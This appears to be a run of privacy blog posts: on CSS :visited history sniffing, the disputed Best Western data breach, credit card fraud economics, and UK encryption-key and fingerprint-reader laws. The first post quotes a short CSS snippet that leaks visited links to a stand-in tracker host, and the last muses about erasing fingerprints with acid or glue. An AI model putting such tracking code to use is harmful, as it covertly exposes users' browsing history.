It has been known since 2006 that is it possible for any website to query whether you have visited any of a list of other websites without even having to use javascript. One way to do this is to rely on the fact that CSS (that language for HTML style sheets used by virtually every website) allows website hosts to specific a different color or background image for a given link depending on whether that link has been visited before. By specifying a url on the snooping host as the background of a visiting link, a snooping website can determine whether you have visited any given link, as demonstrated by this code snippet from the above page:

   <head>
    [...]
    <style type="text/css">
      #foo:visited{
         background: url http://evil.eve.ws/tracker?who=alice&amp...);
      }
    </style>
    </head>

    <a id="foo" href="http://some.bank.com/login"></a>

To watch this attack in action, click on the ‘View all sites of interest’ link on the right hand side of this page by Markus Jakobsson, Tom N. Jagatic, and Sid Stamm at the University of Indiana. The authors of the page specifically suggest that this sort of attack could be used by phishers to figure out which bank to emulate to fool a user into logging into a fake bank page, but there are any number of different ways to use this information. Felten and Schneider have written about a similar attack using cache timing that similarly gives access to a user’s browsing history.

Neither the link background and caching timing attacks rely on javascript, the source of a large number of privacy attacks. This freedom from javascript makes the attacks particularly effective, since one common (though highly invconcenient) method of securing a browser is to turn off javascript support. Even those who choose to turn off javascript are not safe from these attacks. There are firefox extensions to protect against both attacks, but they are not widely used. The developers of the core firefox browser have chosen not to include the code in those extensions in the base browser even though the attack has been well known among security geeks for a couple of years, with the result that the vast majority of users remain vulnerable to the attack. The end result is that, unless you use firefox and install the above extensions or periodically purge your browser history, any website you visit can tell whether you have visited any other website.

Update: The above extensions evidently don’t even work with firefox 3.0, though firefox 3.1 is reported to have a non-ui-accessible configuration setting that will block the visited link color by turning off the visited link feature altogether.

Almost immediately the CIO of Best Western posted a comment on the Sunday Herald story’s web page asserting that “This story is grossly unsubstantiated! … This has affected only ten customers who we are currently being contacted to offer our assistance, none of these were GB customers.” Within a couple of days, Information Week posted an interview with the CIO of Best Western, in which he argued that individual hotel clerks have access only to accounts for their local hotels, that credit card information is deleted from the system within seven days of use, and that the reporter of the original story had basically made up the eight million number out of whole cloth. Neither the Sunday Herald nor the original reporter have amended the story or commented on the claims that they exaggerated the problem. The reporter claimed to have screenshots that showed the entire database of eight million accounts but has not posted those screenshots or further evidence of a large scale data breach.

Notwithstanding the well established habit for companies to attempt to minimize the importance of their data breaches, the bulk of the evidence suggests that the Best Western side of the story is much more likely to be the closest to the truth. Hacker or not hacker, it would be egregious to allow a single hotel clerk from a local hotel access to the credit card details of every single Best Western customer. Likewise, it would be horrible security practice not to monitor access to sensitive customer information by authorized users (as the CIO claims that his systems were doing). With thousands of such local clerks, it would be inevitable that some of them would fall to the temptation of stealing account information without need for any sophisticated software. This is not to say that such a data breach is not possible or that more egregious data breaches have not happened. But without more evidence, it seems very likely that the original reporter got carried away and assumed a much greater breach than actually happened.

What’s interesting about the case is the difficulty of telling exactly what happened and what that difficulty says about the state of security and privacy online. Despite claims of a massive crime wave, the system of social insurance set up around credit cards is able to handle large scale breaches of account information without widely visible effects on customers. For example, the 2007 T. J. Maxx data breach exposed more than 45 million credit card numbers. The FBI reported millions of dollars in theft from Walmart, but that level of theft is line noise within the total credit cards sales for Walmart, let alone for all credit card transactions.

The card companies are able to detect fraudulent card uses in many or most cases and either refuse them or charge them back to the merchants (resulting in higher prices by the merchants). Thieves are more likely to charge small amounts to large numbers of cards than large amounts to individuals cards to avoid notice, further mitigating the amount of damage done. Fraudulent charges that are noticed by customers are eaten by the card companies (and passed on in large to customers as credit card charges), and those that are not are simply eaten by the customers. But again the charges that are most likely not to noticed are small ones. The card companies don’t want customers to feel that their cards are not secure, so they do not widely publish this information to customers, but the industry is structured simply to eat some small percentage of fraudulent charges simply as the price of using credit cards widely.

Because of large scale data breaches and the general insecurity of our current computing / Internet infrastructure, credit card numbers at this point are basically an advisory security feature. They are just secret enough to let other folks know that it is wrong to use them, but not secret enough to stop a bad guy from getting access to them. The credit card companies have a strong vested interest, however, in the idea that credit cards are strongly secure, because customers will stop using them if they feel they can’t be trusted. So they encourage the idea that credit cards are secure, while implementing strong mechanisms on the back end (such as increasingly aggressive fraud detection algorithms) to deal with the fact that they are not.

Massive breaches of credit card like the T. J. Maxx case and the alleged Best Western case highlight the nature of this shell game, though. The system can absorb the loss of tens of millions of card numbers with little or not impact to end customers en masse. But because the credit cards have this interest in hiding what’s actually happening, it’s very difficult to decode these cases. They fade into the background in one way or another — either because the there was no data breach or because the system of social insurance created by the credit card companies absorbs the costs with little real impact on end customers. The only thing we can tell from the cases is the shell game nature of credit card numbers (and online privacy in general, but that’s an argument for further posts!).

Last year, a troubling new law came into effect which makes it a criminal offense to refuse to hand over one’s encryption key to law  enforcement engaged in a ‘legitimate’ investigation. This was tested out in court a couple weeks ago, and unfortunately, the right to privacy lost. As Ars Technica described:

The Court stated that although there was a right to not self-incriminate, this was not absolute, and that the “public interest” can supersede this right in some circumstances.fd

Just last week, the British government floated a proposal to require that a passport be shown in order to purchase a mobile phone or SIM card. After all, whats the point in spending all that money recording calls and real-time location information if you can’t be sure who is speaking on the other end of the line.

Finally, the latest nail in the privacy coffin has been announced: Starting in 2009, British police will be issued hand-held fingerprint readers, connected to a central server via a wireless/cellular connection. Given the existing (and troubling) powers that police have to arbitrarily stop and question people in the street due to “terrorism” concerns, this’ll allow them to immediately determine someone’s identity on the spot, with or without a national ID card.

Thankfully, it isn’t yet a crime to not have working fingerprints. Thus, it’s quite quite easy to imagine the privacy-aware crowd turning to acid, glue or other techniques to erase the ridges and swirls from their own fingertips.